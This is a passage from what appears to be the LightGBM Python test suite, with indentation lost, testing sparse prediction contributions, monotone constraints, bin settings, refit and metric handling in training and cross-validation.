contribs_csr_arr_re = contribs_csr_array.reshape((contribs_csr_array.shape[0],
contribs_csr_array.shape[1] * contribs_csr_array.shape[2]))
if platform.machine() == 'aarch64':
np.testing.assert_allclose(contribs_csr_arr_re, contribs_dense, rtol=1, atol=1e-12)
else:
np.testing.assert_allclose(contribs_csr_arr_re, contribs_dense)
contribs_dense_re = contribs_dense.reshape(contribs_csr_array.shape)
assert np.linalg.norm(gbm.predict(X_test, raw_score=True) - np.sum(contribs_dense_re, axis=2)) < 1e-4
# validate using CSC matrix
X_test_csc = X_test.tocsc()
contribs_csc = gbm.predict(X_test_csc, pred_contrib=True)
assert isinstance(contribs_csc, list)
for perclass_contribs_csc in contribs_csc:
assert isspmatrix_csc(perclass_contribs_csc)
# validate the values are the same
contribs_csc_array = np.swapaxes(np.array([sparse_array.toarray() for sparse_array in contribs_csc]), 0, 1)
contribs_csc_array = contribs_csc_array.reshape((contribs_csc_array.shape[0],
contribs_csc_array.shape[1] * contribs_csc_array.shape[2]))
if platform.machine() == 'aarch64':
np.testing.assert_allclose(contribs_csc_array, contribs_dense, rtol=1, atol=1e-12)
else:
np.testing.assert_allclose(contribs_csc_array, contribs_dense)
@pytest.mark.skipif(psutil.virtual_memory().available / 1024 / 1024 / 1024 < 3, reason='not enough RAM')
def test_int32_max_sparse_contribs():
params = {
'objective': 'binary'
}
train_features = np.random.rand(100, 1000)
train_targets = [0] * 50 + [1] * 50
lgb_train = lgb.Dataset(train_features, train_targets)
gbm = lgb.train(params, lgb_train, num_boost_round=2)
csr_input_shape = (3000000, 1000)
test_features = csr_matrix(csr_input_shape)
for i in range(0, csr_input_shape[0], csr_input_shape[0] // 6):
for j in range(0, 1000, 100):
test_features[i, j] = random.random()
y_pred_csr = gbm.predict(test_features, pred_contrib=True)
# Note there is an extra column added to the output for the expected value
csr_output_shape = (csr_input_shape[0], csr_input_shape[1] + 1)
assert y_pred_csr.shape == csr_output_shape
y_pred_csc = gbm.predict(test_features.tocsc(), pred_contrib=True)
# Note output CSC shape should be same as CSR output shape
assert y_pred_csc.shape == csr_output_shape
def test_sliced_data():
def train_and_get_predictions(features, labels):
dataset = lgb.Dataset(features, label=labels)
lgb_params = {
'application': 'binary',
'verbose': -1,
'min_data': 5,
}
gbm = lgb.train(
params=lgb_params,
train_set=dataset,
num_boost_round=10,
)
return gbm.predict(features)
num_samples = 100
features = np.random.rand(num_samples, 5)
positive_samples = int(num_samples * 0.25)
labels = np.append(np.ones(positive_samples, dtype=np.float32),
np.zeros(num_samples - positive_samples, dtype=np.float32))
# test sliced labels
origin_pred = train_and_get_predictions(features, labels)
stacked_labels = np.column_stack((labels, np.ones(num_samples, dtype=np.float32)))
sliced_labels = stacked_labels[:, 0]
sliced_pred = train_and_get_predictions(features, sliced_labels)
np.testing.assert_allclose(origin_pred, sliced_pred)
# append some columns
stacked_features = np.column_stack((np.ones(num_samples, dtype=np.float32), features))
stacked_features = np.column_stack((np.ones(num_samples, dtype=np.float32), stacked_features))
stacked_features = np.column_stack((stacked_features, np.ones(num_samples, dtype=np.float32)))
stacked_features = np.column_stack((stacked_features, np.ones(num_samples, dtype=np.float32)))
# append some rows
stacked_features = np.concatenate((np.ones(9, dtype=np.float32).reshape((1, 9)), stacked_features), axis=0)
stacked_features = np.concatenate((np.ones(9, dtype=np.float32).reshape((1, 9)), stacked_features), axis=0)
stacked_features = np.concatenate((stacked_features, np.ones(9, dtype=np.float32).reshape((1, 9))), axis=0)
stacked_features = np.concatenate((stacked_features, np.ones(9, dtype=np.float32).reshape((1, 9))), axis=0)
# test sliced 2d matrix
sliced_features = stacked_features[2:102, 2:7]
assert np.all(sliced_features == features)
sliced_pred = train_and_get_predictions(sliced_features, sliced_labels)
np.testing.assert_allclose(origin_pred, sliced_pred)
# test sliced CSR
stacked_csr = csr_matrix(stacked_features)
sliced_csr = stacked_csr[2:102, 2:7]
assert np.all(sliced_csr == features)
sliced_pred = train_and_get_predictions(sliced_csr, sliced_labels)
np.testing.assert_allclose(origin_pred, sliced_pred)
def test_init_with_subset():
data = np.random.random((50, 2))
y = [1] * 25 + [0] * 25
lgb_train = lgb.Dataset(data, y, free_raw_data=False)
subset_index_1 = np.random.choice(np.arange(50), 30, replace=False)
subset_data_1 = lgb_train.subset(subset_index_1)
subset_index_2 = np.random.choice(np.arange(50), 20, replace=False)
subset_data_2 = lgb_train.subset(subset_index_2)
params = {
'objective': 'binary',
'verbose': -1
}
init_gbm = lgb.train(params=params,
train_set=subset_data_1,
num_boost_round=10,
keep_training_booster=True)
lgb.train(params=params,
train_set=subset_data_2,
num_boost_round=10,
init_model=init_gbm)
assert lgb_train.get_data().shape[0] == 50
assert subset_data_1.get_data().shape[0] == 30
assert subset_data_2.get_data().shape[0] == 20
lgb_train.save_binary("lgb_train_data.bin")
lgb_train_from_file = lgb.Dataset('lgb_train_data.bin', free_raw_data=False)
subset_data_3 = lgb_train_from_file.subset(subset_index_1)
subset_data_4 = lgb_train_from_file.subset(subset_index_2)
init_gbm_2 = lgb.train(params=params,
train_set=subset_data_3,
num_boost_round=10,
keep_training_booster=True)
with np.testing.assert_raises_regex(lgb.basic.LightGBMError, "Unknown format of training data"):
lgb.train(params=params,
train_set=subset_data_4,
num_boost_round=10,
init_model=init_gbm_2)
assert lgb_train_from_file.get_data() == "lgb_train_data.bin"
assert subset_data_3.get_data() == "lgb_train_data.bin"
assert subset_data_4.get_data() == "lgb_train_data.bin"
def generate_trainset_for_monotone_constraints_tests(x3_to_category=True):
number_of_dpoints = 3000
x1_positively_correlated_with_y = np.random.random(size=number_of_dpoints)
x2_negatively_correlated_with_y = np.random.random(size=number_of_dpoints)
x3_negatively_correlated_with_y = np.random.random(size=number_of_dpoints)
x = np.column_stack(
(x1_positively_correlated_with_y,
x2_negatively_correlated_with_y,
categorize(x3_negatively_correlated_with_y) if x3_to_category else x3_negatively_correlated_with_y))
zs = np.random.normal(loc=0.0, scale=0.01, size=number_of_dpoints)
scales = 10. * (np.random.random(6) + 0.5)
y = (scales[0] * x1_positively_correlated_with_y
+ np.sin(scales[1] * np.pi * x1_positively_correlated_with_y)
- scales[2] * x2_negatively_correlated_with_y
- np.cos(scales[3] * np.pi * x2_negatively_correlated_with_y)
- scales[4] * x3_negatively_correlated_with_y
- np.cos(scales[5] * np.pi * x3_negatively_correlated_with_y)
+ zs)
categorical_features = []
if x3_to_category:
categorical_features = [2]
trainset = lgb.Dataset(x, label=y, categorical_feature=categorical_features, free_raw_data=False)
return trainset
@pytest.mark.parametrize("test_with_categorical_variable", [True, False])
def test_monotone_constraints(test_with_categorical_variable):
def is_increasing(y):
return (np.diff(y) >= 0.0).all()
def is_decreasing(y):
return (np.diff(y) <= 0.0).all()
def is_non_monotone(y):
return (np.diff(y) < 0.0).any() and (np.diff(y) > 0.0).any()
def is_correctly_constrained(learner, x3_to_category=True):
iterations = 10
n = 1000
variable_x = np.linspace(0, 1, n).reshape((n, 1))
fixed_xs_values = np.linspace(0, 1, n)
for i in range(iterations):
fixed_x = fixed_xs_values[i] * np.ones((n, 1))
monotonically_increasing_x = np.column_stack((variable_x, fixed_x, fixed_x))
monotonically_increasing_y = learner.predict(monotonically_increasing_x)
monotonically_decreasing_x = np.column_stack((fixed_x, variable_x, fixed_x))
monotonically_decreasing_y = learner.predict(monotonically_decreasing_x)
non_monotone_x = np.column_stack(
(
fixed_x,
fixed_x,
categorize(variable_x) if x3_to_category else variable_x,
)
)
non_monotone_y = learner.predict(non_monotone_x)
if not (
is_increasing(monotonically_increasing_y)
and is_decreasing(monotonically_decreasing_y)
and is_non_monotone(non_monotone_y)
):
return False
return True
def are_interactions_enforced(gbm, feature_sets):
def parse_tree_features(gbm):
# trees start at position 1.
tree_str = gbm.model_to_string().split("Tree")[1:]
feature_sets = []
for tree in tree_str:
# split_features are in 4th line.
features = tree.splitlines()[3].split("=")[1].split(" ")
features = set(f"Column_{f}" for f in features)
feature_sets.append(features)
return np.array(feature_sets)
def has_interaction(treef):
n = 0
for fs in feature_sets:
if len(treef.intersection(fs)) > 0:
n += 1
return n > 1
tree_features = parse_tree_features(gbm)
has_interaction_flag = np.array(
[has_interaction(treef) for treef in tree_features]
)
return not has_interaction_flag.any()
trainset = generate_trainset_for_monotone_constraints_tests(
test_with_categorical_variable
)
for test_with_interaction_constraints in [True, False]:
error_msg = ("Model not correctly constrained "
f"(test_with_interaction_constraints={test_with_interaction_constraints})")
for monotone_constraints_method in ["basic", "intermediate", "advanced"]:
params = {
"min_data": 20,
"num_leaves": 20,
"monotone_constraints": [1, -1, 0],
"monotone_constraints_method": monotone_constraints_method,
"use_missing": False,
}
if test_with_interaction_constraints:
params["interaction_constraints"] = [[0], [1], [2]]
constrained_model = lgb.train(params, trainset)
assert is_correctly_constrained(
constrained_model, test_with_categorical_variable
), error_msg
if test_with_interaction_constraints:
feature_sets = [["Column_0"], ["Column_1"], "Column_2"]
assert are_interactions_enforced(constrained_model, feature_sets)
def test_monotone_penalty():
def are_first_splits_non_monotone(tree, n, monotone_constraints):
if n <= 0:
return True
if "leaf_value" in tree:
return True
if monotone_constraints[tree["split_feature"]] != 0:
return False
return (are_first_splits_non_monotone(tree["left_child"], n - 1, monotone_constraints)
and are_first_splits_non_monotone(tree["right_child"], n - 1, monotone_constraints))
def are_there_monotone_splits(tree, monotone_constraints):
if "leaf_value" in tree:
return False
if monotone_constraints[tree["split_feature"]] != 0:
return True
return (are_there_monotone_splits(tree["left_child"], monotone_constraints)
or are_there_monotone_splits(tree["right_child"], monotone_constraints))
max_depth = 5
monotone_constraints = [1, -1, 0]
penalization_parameter = 2.0
trainset = generate_trainset_for_monotone_constraints_tests(x3_to_category=False)
for monotone_constraints_method in ["basic", "intermediate", "advanced"]:
params = {
'max_depth': max_depth,
'monotone_constraints': monotone_constraints,
'monotone_penalty': penalization_parameter,
"monotone_constraints_method": monotone_constraints_method,
}
constrained_model = lgb.train(params, trainset, 10)
dumped_model = constrained_model.dump_model()["tree_info"]
for tree in dumped_model:
assert are_first_splits_non_monotone(tree["tree_structure"], int(penalization_parameter),
monotone_constraints)
assert are_there_monotone_splits(tree["tree_structure"], monotone_constraints)
# test if a penalty as high as the depth indeed prohibits all monotone splits
def test_monotone_penalty_max():
max_depth = 5
monotone_constraints = [1, -1, 0]
penalization_parameter = max_depth
trainset_constrained_model = generate_trainset_for_monotone_constraints_tests(x3_to_category=False)
x = trainset_constrained_model.data
y = trainset_constrained_model.label
x3_negatively_correlated_with_y = x[:, 2]
trainset_unconstrained_model = lgb.Dataset(x3_negatively_correlated_with_y.reshape(-1, 1), label=y)
params_constrained_model = {
'monotone_constraints': monotone_constraints,
'monotone_penalty': penalization_parameter,
"max_depth": max_depth,
"gpu_use_dp": True,
}
params_unconstrained_model = {
"max_depth": max_depth,
"gpu_use_dp": True,
}
unconstrained_model = lgb.train(params_unconstrained_model, trainset_unconstrained_model, 10)
unconstrained_model_predictions = unconstrained_model.predict(
x3_negatively_correlated_with_y.reshape(-1, 1)
)
for monotone_constraints_method in ["basic", "intermediate", "advanced"]:
params_constrained_model["monotone_constraints_method"] = monotone_constraints_method
# The penalization is so high that the first 2 features should not be used here
constrained_model = lgb.train(params_constrained_model, trainset_constrained_model, 10)
# Check that a very high penalization is the same as not using the features at all
np.testing.assert_array_equal(constrained_model.predict(x), unconstrained_model_predictions)
def test_max_bin_by_feature():
col1 = np.arange(0, 100)[:, np.newaxis]
col2 = np.zeros((100, 1))
col2[20:] = 1
X = np.concatenate([col1, col2], axis=1)
y = np.arange(0, 100)
params = {
'objective': 'regression_l2',
'verbose': -1,
'num_leaves': 100,
'min_data_in_leaf': 1,
'min_sum_hessian_in_leaf': 0,
'min_data_in_bin': 1,
'max_bin_by_feature': [100, 2]
}
lgb_data = lgb.Dataset(X, label=y)
est = lgb.train(params, lgb_data, num_boost_round=1)
assert len(np.unique(est.predict(X))) == 100
params['max_bin_by_feature'] = [2, 100]
lgb_data = lgb.Dataset(X, label=y)
est = lgb.train(params, lgb_data, num_boost_round=1)
assert len(np.unique(est.predict(X))) == 3
def test_small_max_bin():
np.random.seed(0)
y = np.random.choice([0, 1], 100)
x = np.ones((100, 1))
x[:30, 0] = -1
x[60:, 0] = 2
params = {'objective': 'binary',
'seed': 0,
'min_data_in_leaf': 1,
'verbose': -1,
'max_bin': 2}
lgb_x = lgb.Dataset(x, label=y)
lgb.train(params, lgb_x, num_boost_round=5)
x[0, 0] = np.nan
params['max_bin'] = 3
lgb_x = lgb.Dataset(x, label=y)
lgb.train(params, lgb_x, num_boost_round=5)
np.random.seed() # reset seed
def test_refit():
X, y = load_breast_cancer(return_X_y=True)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)
params = {
'objective': 'binary',
'metric': 'binary_logloss',
'verbose': -1,
'min_data': 10
}
lgb_train = lgb.Dataset(X_train, y_train)
gbm = lgb.train(params, lgb_train, num_boost_round=20)
err_pred = log_loss(y_test, gbm.predict(X_test))
new_gbm = gbm.refit(X_test, y_test)
new_err_pred = log_loss(y_test, new_gbm.predict(X_test))
assert err_pred > new_err_pred
def test_mape_rf():
X, y = load_boston(return_X_y=True)
params = {
'boosting_type': 'rf',
'objective': 'mape',
'verbose': -1,
'bagging_freq': 1,
'bagging_fraction': 0.8,
'feature_fraction': 0.8,
'boost_from_average': True
}
lgb_train = lgb.Dataset(X, y)
gbm = lgb.train(params, lgb_train, num_boost_round=20)
pred = gbm.predict(X)
pred_mean = pred.mean()
assert pred_mean > 20
def test_mape_dart():
X, y = load_boston(return_X_y=True)
params = {
'boosting_type': 'dart',
'objective': 'mape',
'verbose': -1,
'bagging_freq': 1,
'bagging_fraction': 0.8,
'feature_fraction': 0.8,
'boost_from_average': False
}
lgb_train = lgb.Dataset(X, y)
gbm = lgb.train(params, lgb_train, num_boost_round=40)
pred = gbm.predict(X)
pred_mean = pred.mean()
assert pred_mean > 18
def check_constant_features(y_true, expected_pred, more_params):
X_train = np.ones((len(y_true), 1))
y_train = np.array(y_true)
params = {
'objective': 'regression',
'num_class': 1,
'verbose': -1,
'min_data': 1,
'num_leaves': 2,
'learning_rate': 1,
'min_data_in_bin': 1,
'boost_from_average': True
}
params.update(more_params)
lgb_train = lgb.Dataset(X_train, y_train, params=params)
gbm = lgb.train(params, lgb_train, num_boost_round=2)
pred = gbm.predict(X_train)
assert np.allclose(pred, expected_pred)
def test_constant_features_regression():
params = {
'objective': 'regression'
}
check_constant_features([0.0, 10.0, 0.0, 10.0], 5.0, params)
check_constant_features([0.0, 1.0, 2.0, 3.0], 1.5, params)
check_constant_features([-1.0, 1.0, -2.0, 2.0], 0.0, params)
def test_constant_features_binary():
params = {
'objective': 'binary'
}
check_constant_features([0.0, 10.0, 0.0, 10.0], 0.5, params)
check_constant_features([0.0, 1.0, 2.0, 3.0], 0.75, params)
def test_constant_features_multiclass():
params = {
'objective': 'multiclass',
'num_class': 3
}
check_constant_features([0.0, 1.0, 2.0, 0.0], [0.5, 0.25, 0.25], params)
check_constant_features([0.0, 1.0, 2.0, 1.0], [0.25, 0.5, 0.25], params)
def test_constant_features_multiclassova():
params = {
'objective': 'multiclassova',
'num_class': 3
}
check_constant_features([0.0, 1.0, 2.0, 0.0], [0.5, 0.25, 0.25], params)
check_constant_features([0.0, 1.0, 2.0, 1.0], [0.25, 0.5, 0.25], params)
def test_fpreproc():
def preprocess_data(dtrain, dtest, params):
train_data = dtrain.construct().get_data()
test_data = dtest.construct().get_data()
train_data[:, 0] += 1
test_data[:, 0] += 1
dtrain.label[-5:] = 3
dtest.label[-5:] = 3
dtrain = lgb.Dataset(train_data, dtrain.label)
dtest = lgb.Dataset(test_data, dtest.label, reference=dtrain)
params['num_class'] = 4
return dtrain, dtest, params
X, y = load_iris(return_X_y=True)
dataset = lgb.Dataset(X, y, free_raw_data=False)
params = {'objective': 'multiclass', 'num_class': 3, 'verbose': -1}
results = lgb.cv(params, dataset, num_boost_round=10, fpreproc=preprocess_data)
assert 'multi_logloss-mean' in results
assert len(results['multi_logloss-mean']) == 10
def test_metrics():
X, y = load_digits(n_class=2, return_X_y=True)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)
lgb_train = lgb.Dataset(X_train, y_train, silent=True)
lgb_valid = lgb.Dataset(X_test, y_test, reference=lgb_train, silent=True)
evals_result = {}
params_verbose = {'verbose': -1}
params_obj_verbose = {'objective': 'binary', 'verbose': -1}
params_obj_metric_log_verbose = {'objective': 'binary', 'metric': 'binary_logloss', 'verbose': -1}
params_obj_metric_err_verbose = {'objective': 'binary', 'metric': 'binary_error', 'verbose': -1}
params_obj_metric_inv_verbose = {'objective': 'binary', 'metric': 'invalid_metric', 'verbose': -1}
params_obj_metric_multi_verbose = {'objective': 'binary',
'metric': ['binary_logloss', 'binary_error'],
'verbose': -1}
params_obj_metric_none_verbose = {'objective': 'binary', 'metric': 'None', 'verbose': -1}
params_metric_log_verbose = {'metric': 'binary_logloss', 'verbose': -1}
params_metric_err_verbose = {'metric': 'binary_error', 'verbose': -1}
params_metric_inv_verbose = {'metric_types': 'invalid_metric', 'verbose': -1}
params_metric_multi_verbose = {'metric': ['binary_logloss', 'binary_error'], 'verbose': -1}
params_metric_none_verbose = {'metric': 'None', 'verbose': -1}
def get_cv_result(params=params_obj_verbose, **kwargs):
return lgb.cv(params, lgb_train, num_boost_round=2, verbose_eval=False, **kwargs)
def train_booster(params=params_obj_verbose, **kwargs):
lgb.train(params, lgb_train,
num_boost_round=2,
valid_sets=[lgb_valid],
evals_result=evals_result,
verbose_eval=False, **kwargs)
# no fobj, no feval
# default metric
res = get_cv_result()
assert len(res) == 2
assert 'binary_logloss-mean' in res
# non-default metric in params
res = get_cv_result(params=params_obj_metric_err_verbose)
assert len(res) == 2
assert 'binary_error-mean' in res
# default metric in args
res = get_cv_result(metrics='binary_logloss')
assert len(res) == 2
assert 'binary_logloss-mean' in res
# non-default metric in args
res = get_cv_result(metrics='binary_error')
assert len(res) == 2
assert 'binary_error-mean' in res
# metric in args overwrites one in params
res = get_cv_result(params=params_obj_metric_inv_verbose, metrics='binary_error')
assert len(res) == 2
assert 'binary_error-mean' in res
# multiple metrics in params
res = get_cv_result(params=params_obj_metric_multi_verbose)
assert len(res) == 4
assert 'binary_logloss-mean' in res
assert 'binary_error-mean' in res
# multiple metrics in args
res = get_cv_result(metrics=['binary_logloss', 'binary_error'])
assert len(res) == 4
assert 'binary_logloss-mean' in res
assert 'binary_error-mean' in res
# remove default metric by 'None' in list
res = get_cv_result(metrics=['None'])
assert len(res) == 0
# remove default metric by 'None' aliases
for na_alias in ('None', 'na', 'null', 'custom'):
res = get_cv_result(metrics=na_alias)
assert len(res) == 0
# fobj, no feval
# no default metric
res = get_cv_result(params=params_verbose, fobj=dummy_obj)
assert len(res) == 0
# metric in params
res = get_cv_result(params=params_metric_err_verbose, fobj=dummy_obj)
assert len(res) == 2
assert 'binary_error-mean' in res
# metric in args
res = get_cv_result(params=params_verbose, fobj=dummy_obj, metrics='binary_error')
assert len(res) == 2
assert 'binary_error-mean' in res
# metric in args overwrites its' alias in params
res = get_cv_result(params=params_metric_inv_verbose, fobj=dummy_obj, metrics='binary_error')
assert len(res) == 2
assert 'binary_error-mean' in res
# multiple metrics in params
res = get_cv_result(params=params_metric_multi_verbose, fobj=dummy_obj)
assert len(res) == 4
assert 'binary_logloss-mean' in res
assert 'binary_error-mean' in res
# multiple metrics in args
res = get_cv_result(params=params_verbose, fobj=dummy_obj,
metrics=['binary_logloss', 'binary_error'])
assert len(res) == 4
assert 'binary_logloss-mean' in res
assert 'binary_error-mean' in res
# no fobj, feval
# default metric with custom one
res = get_cv_result(feval=constant_metric)
assert len(res) == 4
assert 'binary_logloss-mean' in res
assert 'error-mean' in res
# non-default metric in params with custom one
res = get_cv_result(params=params_obj_metric_err_verbose, feval=constant_metric)
assert len(res) == 4
assert 'binary_error-mean' in res
assert 'error-mean' in res
# default metric in args with custom one
res = get_cv_result(metrics='binary_logloss', feval=constant_metric)
assert len(res) == 4
assert 'binary_logloss-mean' in res
assert 'error-mean' in res
# non-default metric in args with custom one
res = get_cv_result(metrics='binary_error', feval=constant_metric)
assert len(res) == 4
assert 'binary_error-mean' in res
assert 'error-mean' in res
# metric in args overwrites one in params, custom one is evaluated too
res = get_cv_result(params=params_obj_metric_inv_verbose, metrics='binary_error', feval=constant_metric)
assert len(res) == 4
assert 'binary_error-mean' in res
assert 'error-mean' in res
# multiple metrics in params with custom one
res = get_cv_result(params=params_obj_metric_multi_verbose, feval=constant_metric)
assert len(res) == 6
assert 'binary_logloss-mean' in res
assert 'binary_error-mean' in res
assert 'error-mean' in res
# multiple metrics in args with custom one
res = get_cv_result(metrics=['binary_logloss', 'binary_error'], feval=constant_metric)
assert len(res) == 6
assert 'binary_logloss-mean' in res
assert 'binary_error-mean' in res
assert 'error-mean' in res
# custom metric is evaluated despite 'None' is passed
res = get_cv_result(metrics=['None'], feval=constant_metric)
assert len(res) == 2
assert 'error-mean' in res
# fobj, feval
# no default metric, only custom one
res = get_cv_result(params=params_verbose, fobj=dummy_obj, feval=constant_metric)
assert len(res) == 2
assert 'error-mean' in res
# metric in params with custom one
res = get_cv_result(params=params_metric_err_verbose, fobj=dummy_obj, feval=constant_metric)
assert len(res) == 4
assert 'binary_error-mean' in res
assert 'error-mean' in res
# metric in args with custom one
res = get_cv_result(params=params_verbose, fobj=dummy_obj,
feval=constant_metric, metrics='binary_error')
assert len(res) == 4
assert 'binary_error-mean' in res
assert 'error-mean' in res
# metric in args overwrites one in params, custom one is evaluated too
res = get_cv_result(params=params_metric_inv_verbose, fobj=dummy_obj,
feval=constant_metric, metrics='binary_error')
assert len(res) == 4
assert 'binary_error-mean' in res
assert 'error-mean' in res
# multiple metrics in params with custom one
res = get_cv_result(params=params_metric_multi_verbose, fobj=dummy_obj, feval=constant_metric)
assert len(res) == 6
assert 'binary_logloss-mean' in res
assert 'binary_error-mean' in res
assert 'error-mean' in res
# multiple metrics in args with custom one
res = get_cv_result(params=params_verbose, fobj=dummy_obj, feval=constant_metric,
metrics=['binary_logloss', 'binary_error'])
assert len(res) == 6
assert 'binary_logloss-mean' in res
assert 'binary_error-mean' in res
assert 'error-mean' in res
# custom metric is evaluated despite 'None' is passed
res = get_cv_result(params=params_metric_none_verbose, fobj=dummy_obj, feval=constant_metric)
assert len(res) == 2
assert 'error-mean' in res
# no fobj, no feval
# default metric
train_booster()
assert len(evals_result['valid_0']) == 1
assert 'binary_logloss' in evals_result['valid_0']
# default metric in params
train_booster(params=params_obj_metric_log_verbose)
assert len(evals_result['valid_0']) == 1
assert 'binary_logloss' in evals_result['valid_0']
# non-default metric in params
train_booster(params=params_obj_metric_err_verbose)
assert len(evals_result['valid_0']) == 1
assert 'binary_error' in evals_result['valid_0']
# multiple metrics in params
train_booster(params=params_obj_metric_multi_verbose)
assert len(evals_result['valid_0']) == 2
assert 'binary_logloss' in evals_result['valid_0']
assert 'binary_error' in evals_result['valid_0']
# remove default metric by 'None' aliases
for na_alias in ('None', 'na', 'null', 'custom'):
params = {'objective': 'binary', 'metric': na_alias, 'verbose': -1}
train_booster(params=params)
assert len(evals_result) == 0
# fobj, no feval
# no default metric
train_booster(params=params_verbose, fobj=dummy_obj)
assert len(evals_result) == 0
# metric in params
train_booster(params=params_metric_log_verbose, fobj=dummy_obj)
assert len(evals_result['valid_0']) == 1
assert 'binary_logloss' in evals_result['valid_0']
# multiple metrics in params
train_booster(params=params_metric_multi_verbose, fobj=dummy_obj)
assert len(evals_result['valid_0']) == 2
assert 'binary_logloss' in evals_result['valid_0']
assert 'binary_error' in evals_result['valid_0']
# no fobj, feval
# default metric with custom one
train_booster(feval=constant_metric)
assert len(evals_result['valid_0']) == 2
assert 'binary_logloss' in evals_result['valid_0']
assert 'error' in evals_result['valid_0']
# default metric in params with custom one
train_booster(params=params_obj_metric_log_verbose, feval=constant_metric)
assert len(evals_result['valid_0']) == 2
assert 'binary_logloss' in evals_result['valid_0']
assert 'error' in evals_result['valid_0']
# non-default metric in params with custom one
train_booster(params=params_obj_metric_err_verbose, feval=constant_metric)
assert len(evals_result['valid_0']) == 2
assert 'binary_error' in evals_result['valid_0']
assert 'error' in evals_result['valid_0']
# multiple metrics in params with custom one
train_booster(params=params_obj_metric_multi_verbose, feval=constant_metric)
assert len(evals_result['valid_0']) == 3
assert 'binary_logloss' in evals_result['valid_0']
assert 'binary_error' in evals_result['valid_0']
assert 'error' in evals_result['valid_0']
# custom metric is evaluated despite 'None' is passed
train_booster(params=params_obj_metric_none_verbose, feval=constant_metric)
assert len(evals_result) == 1
assert 'error' in evals_result['valid_0']
# fobj, feval
# no default metric, only custom one
train_booster(params=params_verbose, fobj=dummy_obj, feval=constant_metric)
assert len(evals_result['valid_0']) == 1
assert 'error' in evals_result['valid_0']
# metric in params with custom one
train_booster(params=params_metric_log_verbose, fobj=dummy_obj, feval=constant_metric)
assert len(evals_result['valid_0']) == 2
assert 'binary_logloss' in evals_result['valid_0']
assert 'error' in evals_result['valid_0']
# multiple metrics in params with custom one
train_booster(params=params_metric_multi_verbose, fobj=dummy_obj, feval=constant_metric)
assert len(evals_result['valid_0']) == 3
assert 'binary_logloss' in evals_result['valid_0']
assert 'binary_error' in evals_result['valid_0']
assert 'error' in evals_result['valid_0']
# custom metric is evaluated despite 'None' is passed
train_booster(params=params_metric_none_verbose, fobj=dummy_obj, feval=constant_metric)
assert len(evals_result) == 1
assert 'error' in evals_result['valid_0']
X, y = load_digits(n_class=3, return_X_y=True)
lgb_train = lgb.Dataset(X, y, silent=True)
obj_multi_aliases = ['multiclass', 'softmax', 'multiclassova', 'multiclass_ova', 'ova', 'ovr']
for obj_multi_alias in obj_multi_aliases:
params_obj_class_3_verbose = {'objective': obj_multi_alias, 'num_class': 3, 'verbose': -1}
params_obj_class_1_verbose = {'objective': obj_multi_alias, 'num_class': 1, 'verbose': -1}
params_obj_verbose = {'objective': obj_multi_alias, 'verbose': -1}
# multiclass default metric
res = get_cv_result(params_obj_class_3_verbose)
assert len(res) == 2
assert 'multi_logloss-mean' in res
# multiclass default metric with custom one
res = get_cv_result(params_obj_class_3_verbose, feval=constant_metric)
assert len(res) == 4
assert 'multi_logloss-mean' in res
assert 'error-mean' in res
# multiclass metric alias with custom one for custom objective
res = get_cv_result(params_obj_class_3_verbose, fobj=dummy_obj, feval=constant_metric)
assert len(res) == 2
assert 'error-mean' in res
# no metric for invalid class_num
res = get_cv_result(params_obj_class_1_verbose, fobj=dummy_obj)
assert len(res) == 0
# custom metric for invalid class_num
res = get_cv_result(params_obj_class_1_verbose, fobj=dummy_obj, feval=constant_metric)
assert len(res) == 2
assert 'error-mean' in res
# multiclass metric alias with custom one with invalid class_num
with pytest.raises(lgb.basic.LightGBMError):
get_cv_result(params_obj_class_1_verbose, metrics=obj_multi_alias,
fobj=dummy_obj, feval=constant_metric)
# multiclass default metric without num_class
with pytest.raises(lgb.basic.LightGBMError):
get_cv_result(params_obj_verbose)
for metric_multi_alias in obj_multi_aliases + ['multi_logloss']:
# multiclass metric alias
res = get_cv_result(params_obj_class_3_verbose, metrics=metric_multi_alias)
assert len(res) == 2
assert 'multi_logloss-mean' in res
# multiclass metric
res = get_cv_result(params_obj_class_3_verbose, metrics='multi_error')
assert len(res) == 2
assert 'multi_error-mean' in res
# non-valid metric for multiclass objective
with pytest.raises(lgb.basic.LightGBMError):
get_cv_result(params_obj_class_3_verbose, metrics='binary_logloss')
params_class_3_verbose = {'num_class': 3, 'verbose': -1}
# non-default num_class for default objective
with pytest.raises(lgb.basic.LightGBMError):
get_cv_result(params_class_3_verbose)
# no metric with non-default num_class for custom objective
res = get_cv_result(params_class_3_verbose, fobj=dummy_obj)
assert len(res) == 0
for metric_multi_alias in obj_multi_aliases + ['multi_logloss']:
# multiclass metric alias for custom objective
res = get_cv_result(params_class_3_verbose, metrics=metric_multi_alias, fobj=dummy_obj)
assert len(res) == 2
assert 'multi_logloss-mean' in res
# multiclass metric for custom objective
res = get_cv_result(params_class_3_verbose, metrics='multi_error', fobj=dummy_obj)
assert len(res) == 2
assert 'multi_error-mean' in res
# binary metric with non-default num_class for custom objective
with pytest.raises(lgb.basic.LightGBMError):
get_cv_result(params_class_3_verbose, metrics='binary_error', fobj=dummy_obj)
def test_multiple_feval_train():
X, y = load_breast_cancer(return_X_y=True)
params = {'verbose': -1, 'objective': 'binary', 'metric': 'binary_logloss'}
X_train, X_validation, y_train, y_validation = train_test_split(X, y, test_size=0.2)
train_dataset = lgb.Dataset(data=X_train, label=y_train, silent=True)
validation_dataset = lgb.Dataset(data=X_validation, label=y_validation, reference=train_dataset, silent=True)
evals_result = {}
lgb.train(
params=params,
train_set=train_dataset,
valid_sets=validation_dataset,
num_boost_round=5,
feval=[constant_metric, decreasing_metric],
evals_result=evals_result)
assert len(evals_result['valid_0']) == 3
assert 'binary_logloss' in evals_result['valid_0']
assert 'error' in evals_result['valid_0']
assert 'decreasing_metric' in evals_result['valid_0']
def test_multiple_feval_cv():
X, y = load_breast_cancer(return_X_y=True)
params = {'verbose': -1, 'objective': 'binary', 'metric': 'binary_logloss'}
train_dataset = lgb.Dataset(data=X, label=y, silent=True)
cv_results = lgb.cv(
params=params,
train_set=train_dataset,
num_boost_round=5,
feval=[constant_metric, decreasing_metric])
# Expect three metrics but mean and stdv for each metric
assert len(cv_results) == 6
assert 'binary_logloss-mean' in cv_results
assert 'error-mean' in cv_results
assert 'decreasing_metric-mean' in cv_results
assert 'binary_logloss-stdv' in cv_results
assert 'error-stdv' in cv_results
assert 'decreasing_metric-stdv' in cv_results
@pytest.mark.skipif(psutil.virtual_memory().available / 1024 / 1024 / 1024 < 3, reason='not enough RAM')
